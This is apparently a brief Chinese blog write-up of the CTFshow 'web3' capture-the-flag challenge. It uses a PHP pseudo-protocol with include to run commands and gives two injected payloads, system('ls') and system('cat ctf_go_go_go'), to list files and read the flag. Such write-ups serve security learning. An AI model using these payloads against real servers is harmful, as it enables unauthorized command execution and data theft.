刷题之旅第23站,CTFshow web3

感谢ctf show平台提供题目

使用php伪协议 + include, 实现执行任意命令。

<?php system('ls');?>

在这里插入图片描述

获取flag

<?php system('cat ctf_go_go_go');?>

在这里插入图片描述

原创文章不易,点个赞再走吧。

在这里插入图片描述

发布了50 篇原创文章 · 获赞 12 · 访问量 1892

猜你喜欢

转载自blog.csdn.net/weixin_45940434/article/details/104351271